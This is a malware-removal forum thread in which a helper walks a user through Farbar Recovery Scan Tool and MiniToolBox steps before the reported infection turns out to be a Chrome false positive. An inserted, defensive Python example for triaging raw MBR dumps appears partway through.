"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL" not found

==== EOF on 13/08/2015 at 11:32:38,39 ======================

Edited by Oh My!, 13 August 2015 - 09:03 AM.


#6 GiakMind
  • Topic Starter
  • Members
  • 10 posts
  • Gender:Male
  • Location:Roma, Italy

Posted 13 August 2015 - 08:29 AM

Sorry for the double post, I'll be on vacation for 6 days, but I still want your help when I'm back! Ciao :)



#7 Oh My!
    Adware and Spyware and Malware.....
  • Malware Response Instructor
  • 36,392 posts
  • Gender:Male
  • Location:California

Posted 13 August 2015 - 09:17 AM

No problem on the delay, thank you for letting me know. Enjoy yourself! :)

Can you tell me if you experience this with just Chrome or is it the same with any other browser?

When you return please do these things for me.

===================================================

MBR Dump Using Farbar's Recovery Scan Tool in the Recovery Environment

--------------------

For this step you will need a USB flash drive.
  • Press the Windows key + R on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it on the flashdrive as fixlist.txt
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1UU5CAO9
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GO4PDM3X
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4UWGBUY
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5PQH01S
SaveMbr: Drive=0
  • Please download Farbar Recovery Scan Tool and save it to a flash drive. You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Plug the flashdrive into the infected PC and follow the 2 step process below to enter the System Recovery Options using one of the three options listed, then run Farbar's Recovery Scan Tool
----------

Entering into the System Recovery Options

Option #1

To enter System Recovery Options in Windows 8:

Option #2

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.
Option #3

To enter System Recovery Options by using Windows installation disc:
  • Insert the installation disc.
  • Restart your computer.
  • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
  • Click Repair your computer.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next
----------

Running Farbar's Recovery Scan Tool in System Recovery
  • Once you are in the System Recovery Options menu you will get the following options:

Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt

  • Select Command Prompt
  • In the command window type in Notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select Computer and find your flash drive letter and close the notepad.
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    • Note: Replace letter e with the drive letter of your flash drive.
  • When the tool opens click Yes to disclaimer.
  • Press Fix button.
  • It will make a log (mbrdump.txt) on the flash drive. Please attach it to your reply. If you open the file you will not be able to read it.
===================================================

Farbar's MiniToolBox

--------------------
  • Please download MiniToolBox, save it to your desktop
  • Please close any Firefox browsers you may have open
  • Double click the icon to launch the program
  • Make sure only the following options are checked:

Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries

  • Click Go and once the scan is completed a Result.txt Notepad document will open on your desktop
  • Please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • Fixlog
  • Attached mbrdump.txt file
  • MiniToolBox log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."
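The mbrdump.txt that the SaveMbr directive writes is a raw disk sector, which is why the post says it is unreadable in Notepad. The script below is an added example for reading such a dump; it is not part of this thread or of Farbar's tools, and it assumes the file is the bare 512-byte sector and nothing else. It checks the 0x55AA boot signature, decodes the four partition table entries, and hashes the 446-byte bootstrap area so it can be compared against a known-good image, which is the check that separates an MBR bootkit from a clean boot sector. The sample sector, the stub boot code and the partial partition-type table are constructed here for illustration.

```python
"""Triage a raw MBR dump (e.g. FRST's mbrdump.txt, assumed to be the bare 512-byte sector).

Added example, not part of the thread or of Farbar's tools. A bootkit lives in the
446-byte bootstrap area, so the useful checks are: is the 0x55AA signature intact,
does the partition table still make sense, and does the boot code hash match a
known-good image of the same machine?
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOTSTRAP_SIZE = 446            # bytes 0..445: boot code, the part a bootkit replaces
PARTITION_TABLE_OFFSET = 446    # four 16-byte partition entries follow the boot code
BOOT_SIGNATURE = b"\x55\xaa"    # bytes 510..511

# Partial partition-type table (illustrative); anything else is reported by its raw byte.
PARTITION_TYPES = {0x00: "empty", 0x05: "extended", 0x07: "NTFS/exFAT",
                   0x0C: "FAT32 LBA", 0x0F: "extended LBA", 0x83: "Linux",
                   0xEE: "GPT protective"}


def parse_partition_entry(raw16):
    """Decode one 16-byte partition table entry (little-endian; CHS fields ignored)."""
    status, _chs_start, ptype, _chs_end, lba_start, sectors = struct.unpack("<B3sB3sII", raw16)
    return {"status": status, "bootable": status == 0x80, "type": ptype,
            "type_name": PARTITION_TYPES.get(ptype, "0x%02X" % ptype),
            "lba_start": lba_start, "sectors": sectors}


def parse_mbr(data):
    """Split a sector into boot-code hash, partition table and signature check."""
    if len(data) < SECTOR_SIZE:
        raise ValueError("MBR dump is shorter than one sector (%d bytes)" % len(data))
    sector = data[:SECTOR_SIZE]
    entries = [parse_partition_entry(sector[PARTITION_TABLE_OFFSET + 16 * i:
                                            PARTITION_TABLE_OFFSET + 16 * (i + 1)])
               for i in range(4)]
    return {"signature_ok": sector[SECTOR_SIZE - 2:] == BOOT_SIGNATURE,
            "bootstrap_sha256": hashlib.sha256(sector[:BOOTSTRAP_SIZE]).hexdigest(),
            "partitions": entries}


def triage(data, known_good_bootstrap_sha256=None):
    """Return (parsed MBR, list of findings). An empty list means nothing looked off."""
    info = parse_mbr(data)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing or corrupt")
    used = [p for p in info["partitions"] if p["type"] != 0x00]
    bootable = [p for p in used if p["bootable"]]
    if len(bootable) != 1:
        findings.append("expected exactly one active partition, found %d" % len(bootable))
    for i, p in enumerate(info["partitions"]):
        if p["status"] not in (0x00, 0x80):
            findings.append("partition %d has invalid status byte 0x%02X" % (i, p["status"]))
        if p["type"] != 0x00 and p["sectors"] == 0:
            findings.append("partition %d (%s) has zero length" % (i, p["type_name"]))
    if known_good_bootstrap_sha256 and info["bootstrap_sha256"] != known_good_bootstrap_sha256:
        findings.append("bootstrap code differs from the known-good image")
    return info, findings


def build_sample_mbr(boot_code=b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c"):
    """Constructed sample sector (not a real dump): stub boot code, one active NTFS partition."""
    bootstrap = boot_code.ljust(BOOTSTRAP_SIZE, b"\x00")
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 204800)
    table = entry + b"\x00" * (3 * 16)
    return bootstrap + table + BOOT_SIGNATURE


if __name__ == "__main__":
    clean = build_sample_mbr()
    info, findings = triage(clean)
    print("clean sector:", findings or "no findings", info["bootstrap_sha256"][:16])
    # Same partition table, different boot code: what a bootkit infection looks like.
    tampered = build_sample_mbr(b"\xeb\xfe")
    _, findings = triage(tampered, known_good_bootstrap_sha256=info["bootstrap_sha256"])
    print("tampered sector:", findings)
```

On a real dump, call `triage(open("mbrdump.txt", "rb").read(), known_hash)` with the hash taken from a trusted image of the same disk. The signature and partition-table checks alone are not enough: a bootkit keeps both intact and only swaps the boot code, so the bootstrap hash comparison is the part that matters.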

#8 GiakMind
  • Topic Starter
  • Members
  • 10 posts
  • Gender:Male
  • Location:Roma, Italy

Posted 18 August 2015 - 05:05 PM

I'm back. This happened on Google Chrome only. Yesterday I checked the news about this virus and it turned out it was a false positive. In fact, now it's fixed (no more alarms displayed) so I don't need to continue our procedure anymore!

Thank you :)



#9 Oh My!
    Adware and Spyware and Malware.....
  • Malware Response Instructor
  • 36,392 posts
  • Gender:Male
  • Location:California

Posted 18 August 2015 - 05:45 PM

Thanks for letting me know. Yes, I have seen a few of these false positives in the last week. Please allow me to leave you with this.

===================================================

Keeping Your Computer Safe

----------

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:

In addition, here are some more links you might find of interest:

Thank you for placing your trust in BleepingComputer. It was a pleasure serving you.
Gary
 

#10 Oh My!
    Adware and Spyware and Malware.....
  • Malware Response Instructor
  • 36,392 posts
  • Gender:Male
  • Location:California

Posted 19 August 2015 - 09:25 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 



